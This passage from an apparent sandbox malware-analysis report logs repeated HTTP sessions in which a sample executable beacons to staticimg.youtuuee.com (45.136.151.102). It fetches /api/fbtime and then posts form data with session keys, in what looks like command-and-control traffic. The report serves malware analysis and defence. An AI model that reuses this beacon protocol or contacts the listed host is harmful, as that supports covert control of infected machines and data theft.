1366 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:35.198050976 CEST
1366 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 32 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 46 4b 4d 75 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150329,"time":1635061595,"rand_str":"hFKMuq"}0
Oct 24, 2021 09:46:35.355761051 CEST
1366 OUT POST /api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:35.506477118 CEST
1367 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
18 192.168.2.5 49770 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:36.540766954 CEST
1368 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:36.688316107 CEST
1368 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 71 6a 44 47 41 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150371,"time":1635061596,"rand_str":"uqjDGA"}0
Oct 24, 2021 09:46:36.806778908 CEST
1369 OUT POST /api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 34 of 58
Oct 24, 2021 09:46:37.032989025 CEST
1369 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
19 192.168.2.5 49771 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:37.992247105 CEST
1370 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:38.139581919 CEST
1371 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 33 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 76 6b 58 49 4b 34 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150431,"time":1635061598,"rand_str":"vkXIK4"}0
Oct 24, 2021 09:46:38.253591061 CEST
1371 OUT POST /api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:38.409102917 CEST
1372 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.2.5 49747 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:13.880568027 CEST
1150 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:14.029927969 CEST
1187 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 75 79 63 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149263,"time":1635061573,"rand_str":"5Ruycq"}0
Oct 24, 2021 09:46:14.115669966 CEST
1323 OUT POST /api/?sid=2149263&key=30871ac7c5fca22d591ee3c3e3f7faa8 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 35 of 58
Oct 24, 2021 09:46:14.271146059 CEST
1324 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
20 192.168.2.5 49772 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:39.382689953 CEST
1373 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:39.533291101 CEST
1373 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 37 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 59 39 64 4b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150479,"time":1635061599,"rand_str":"5RY9dK"}0
Oct 24, 2021 09:46:39.628333092 CEST
1373 OUT POST /api/?sid=2150479&key=d26e2d32e64af0304786124de837af72 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:39.781892061 CEST
1375 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
21 192.168.2.5 49775 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:40.870773077 CEST
1397 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:41.015261889 CEST
1398 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 55 65 36 68 70 67 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150543,"time":1635061600,"rand_str":"Ue6hpg"}0
Oct 24, 2021 09:46:41.125655890 CEST
1398 OUT POST /api/?sid=2150543&key=dc8b6a39192685a24adf63edb72eaa2f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 36 of 58
Oct 24, 2021 09:46:41.280822039 CEST
1399 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
22 192.168.2.5 49776 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:42.144409895 CEST
1400 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:42.296432018 CEST
1400 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 39 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 45 47 57 48 4e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150597,"time":1635061602,"rand_str":"hEGWHN"}0
Oct 24, 2021 09:46:42.505656004 CEST
1401 OUT POST /api/?sid=2150597&key=f556d9b1b3eb13930c8eb84fd2c75d69 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:42.660232067 CEST
1401 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
23 192.168.2.5 49777 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:43.287152052 CEST
1402 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:43.442729950 CEST
1402 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 42 52 48 64 69 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150643,"time":1635061603,"rand_str":"4BRHdi"}0
Oct 24, 2021 09:46:43.451596975 CEST
1403 OUT POST /api/?sid=2150643&key=00bda22e431ce351ebc677dc0b52b42e HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 37 of 58
Oct 24, 2021 09:46:43.604079962 CEST
1404 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
24 192.168.2.5 49778 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:43.910032988 CEST
1404 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.059397936 CEST
1405 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 79 37 55 41 32 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150673,"time":1635061603,"rand_str":"Py7UA2"}0
Oct 24, 2021 09:46:44.071578026 CEST
1405 OUT POST /api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.230175018 CEST
1406 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
25 192.168.2.5 49779 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:44.549891949 CEST
1407 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:44.695611954 CEST
1407 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 59 42 65 45 33 49 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150707,"time":1635061604,"rand_str":"YBeE3I"}0
Oct 24, 2021 09:46:44.707463980 CEST
1407 OUT POST /api/?sid=2150707&key=ddacdc5d5fb6e792522698a758a1431a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 38 of 58
Oct 24, 2021 09:46:44.859213114 CEST
1408 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
26 192.168.2.5 49780 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:45.172622919 CEST
1409 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:45.318222046 CEST
1409 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 33 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 78 6b 67 64 69 70 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150735,"time":1635061605,"rand_str":"xkgdip"}0
Oct 24, 2021 09:46:45.329612017 CEST
1410 OUT POST /api/?sid=2150735&key=141effec60248e2d310c38549aec1135 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:45.483130932 CEST
1410 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
27 192.168.2.5 49781 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:45.814385891 CEST
1411 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:45.966428995 CEST
1412 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 79 32 74 5a 65 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150763,"time":1635061605,"rand_str":"6y2tZe"}0
Oct 24, 2021 09:46:45.979497910 CEST
1412 OUT POST /api/?sid=2150763&key=48ddd1efffb3f391c22b544a783191cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 39 of 58
Oct 24, 2021 09:46:46.131217003 CEST
1413 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
28 192.168.2.5 49782 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:46.451883078 CEST
1414 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:46.599595070 CEST
1414 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 39 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 42 58 65 64 37 72 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150799,"time":1635061606,"rand_str":"BXed7r"}0
Oct 24, 2021 09:46:46.608633041 CEST
1414 OUT POST /api/?sid=2150799&key=5bcf6127fb480887256a415fe5d0b555 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:46.761059046 CEST
1415 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
29 192.168.2.5 49783 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:47.079695940 CEST
1416 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:47.225680113 CEST
1416 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 33 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 70 68 55 71 4d 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150837,"time":1635061607,"rand_str":"KphUqM"}0
Oct 24, 2021 09:46:47.235615015 CEST
1417 OUT POST /api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Copyright Joe Security LLC 2021 Page 40 of 58
Oct 24, 2021 09:46:47.394483089 CEST
1417 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.2.5 49751 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
TimestampkBytestransferred Direction Data
Oct 24, 2021 09:46:15.055269003 CEST
1325 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
